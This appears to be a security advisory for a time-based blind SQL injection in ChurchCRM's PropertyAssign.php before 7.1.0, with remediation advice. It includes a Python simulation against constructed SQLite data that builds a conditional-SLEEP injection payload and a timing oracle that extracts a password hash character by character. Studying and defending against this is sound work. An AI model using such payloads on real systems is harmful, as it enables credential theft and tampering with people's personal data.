ChurchCRM Time-Based Blind SQL Injection Vulnerability in PropertyAssign.php Prior to 7.1.0

Vulnerability

A time-based blind SQL injection vulnerability has been identified in ChurchCRM versions prior to 7.1.0. It allows any authenticated user holding the Edit Records or Manage Groups permission to inject SQL through the PropertyAssign.php endpoint. The flaw arises from insufficient sanitization of user-supplied input before it is used in a database query, which lets such a user exfiltrate or modify any database content, including user credentials, personally identifiable information (PII) and configuration secrets.

Impact

Because the injection is blind and time-based, the attacker never sees query output directly; instead, each injected condition is answered by whether the response is delayed, which is enough to read out database content one character at a time or to modify it. This includes user credentials and sensitive personal information. The attack requires only an authenticated account that holds the Edit Records or Manage Groups permission, not administrative access.

Reproduction

To reproduce this vulnerability, an authenticated user with Edit Records or Manage Groups permissions sends a POST request to the PropertyAssign.php endpoint whose Value parameter carries a crafted SQL injection payload, which is then evaluated as part of the endpoint's SQL query. Because the endpoint returns no query output, the injection is confirmed by timing: a payload that makes the database pause only when a chosen condition is true (typically a conditional sleep) produces a measurably delayed response when that condition holds and a normal response time otherwise. Compare several samples against an un-injected baseline request so that ordinary network jitter is not mistaken for an injected delay.
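The following is an added, self-contained simulation of the bug class described above; it is not ChurchCRM's code, and the table names, column names, query shape and sample data are constructed for the example. It places a Value parameter that is interpolated into an UPDATE (the vulnerable pattern) beside the parameterised fix, emulates MySQL's SLEEP() on SQLite so the delay oracle behaves as it would against the real database, and shows how a timing oracle recovers a credential hash one character at a time through the vulnerable path while the hardened path stores the payload as inert text. The concatenation operator in the payload is SQLite's; the actual quoting context and operator for the ChurchCRM query are not shown on this page and are an assumption here.

```python
"""Time-based blind SQL injection, simulated offline: a Value parameter that is
interpolated into an UPDATE (the bug class) next to the parameterised fix.
Schema, query shape and table names are constructed for this example and are
not ChurchCRM's; MySQL's SLEEP() is emulated on SQLite so the delay oracle
behaves the way it would against the real database."""
import sqlite3
import time
from statistics import median
from typing import Callable

SLEEP_SECONDS = 0.3   # delay the injected condition triggers when it is true

# Constructed sample data: one credential row to leak and one property row.
SCHEMA = """
CREATE TABLE users (id INTEGER, name TEXT, password_hash TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b');
CREATE TABLE person_property (per_id INTEGER, pro_id INTEGER, value TEXT);
INSERT INTO person_property VALUES (1, 1, 'initial');
"""


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)

    # SQLite has no SLEEP(); register one so CASE ... THEN SLEEP(n) stalls
    # exactly as it would on MySQL/MariaDB.
    def sleep(seconds: float) -> int:
        time.sleep(seconds)
        return 0

    conn.create_function("SLEEP", 1, sleep)
    return conn


def assign_vulnerable(conn: sqlite3.Connection, per_id: int, pro_id: int, value: str) -> None:
    """Bug class: Value is pasted into the SQL text, so it can close the quote
    and append expressions the database will evaluate."""
    sql = (f"UPDATE person_property SET value = '{value}' "
           f"WHERE per_id = {per_id} AND pro_id = {pro_id}")
    conn.execute(sql)


def assign_hardened(conn: sqlite3.Connection, per_id: int, pro_id: int, value: str) -> None:
    """Fix: a prepared statement binds Value as data; quotes inside it are inert."""
    conn.execute("UPDATE person_property SET value = ? WHERE per_id = ? AND pro_id = ?",
                 (value, per_id, pro_id))


def timing_payload(condition_sql: str) -> str:
    """Close the open string literal, sleep only if condition_sql is true, then
    re-open the literal so the statement still parses. '||' is SQLite string
    concatenation (assumed context; MySQL would need CONCAT() and the real
    query's quoting)."""
    return (f"x' || (SELECT CASE WHEN ({condition_sql}) "
            f"THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END) || '")


def elapsed(fn: Callable, *args) -> float:
    start = time.perf_counter()
    fn(*args)
    return time.perf_counter() - start


def condition_holds(conn, assign, condition_sql: str, samples: int = 3) -> bool:
    """Delay oracle: median time of a benign write versus median time of the
    injected write; a gap close to SLEEP_SECONDS means the condition was true."""
    baseline = median(elapsed(assign, conn, 1, 1, "benign") for _ in range(samples))
    injected = median(elapsed(assign, conn, 1, 1, timing_payload(condition_sql))
                      for _ in range(samples))
    return injected - baseline >= 0.8 * SLEEP_SECONDS


def leak_hash_prefix(conn, assign, length: int = 2, alphabet: str = "0123456789abcdef") -> str:
    """Recover the first `length` characters of the admin hash one character at
    a time, which is how time-based blind exfiltration proceeds."""
    known = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            cond = (f"(SELECT substr(password_hash, {pos}, 1) FROM users "
                    f"WHERE name = 'admin') = '{ch}'")
            if condition_holds(conn, assign, cond, samples=1):
                known += ch
                break
        else:
            break   # no character produced a delay: the injection did not execute
    return known


def current_value(conn) -> str:
    return conn.execute("SELECT value FROM person_property WHERE per_id = 1").fetchone()[0]


if __name__ == "__main__":
    vuln = open_db()
    print("vulnerable path leaks:", leak_hash_prefix(vuln, assign_vulnerable))
    safe = open_db()
    print("hardened path leaks:  ", repr(leak_hash_prefix(safe, assign_hardened)))
    print("hardened path stored: ", current_value(safe)[:24], "...")
```

The oracle compares medians against a baseline rather than trusting a single slow response, which is the same discipline to apply when verifying the real endpoint over a network. Against the vulnerable function only the correct character stalls the query, so the hash prefix comes back character by character; against the parameterised function no condition ever causes a delay and the payload simply ends up stored verbatim in the value column.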

Remediation

Users are advised to upgrade to ChurchCRM version 7.1.0 or later, where this vulnerability has been fixed. Until the upgrade is applied, limiting the Edit Records and Manage Groups permissions to trusted accounts reduces the set of users able to reach the affected endpoint, but it does not remove the flaw.

Added: Apr 6, 2026, 4:31 PM
Updated: Apr 6, 2026, 4:31 PM

Vulnerability Rating

Custom Algorithm

spread: 1.9
impact: 3.1
exploitability: 6.6
remediation: 7.7
relevance: 5.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to produce these eight vulnerability categories, which are then combined into the overall risk score.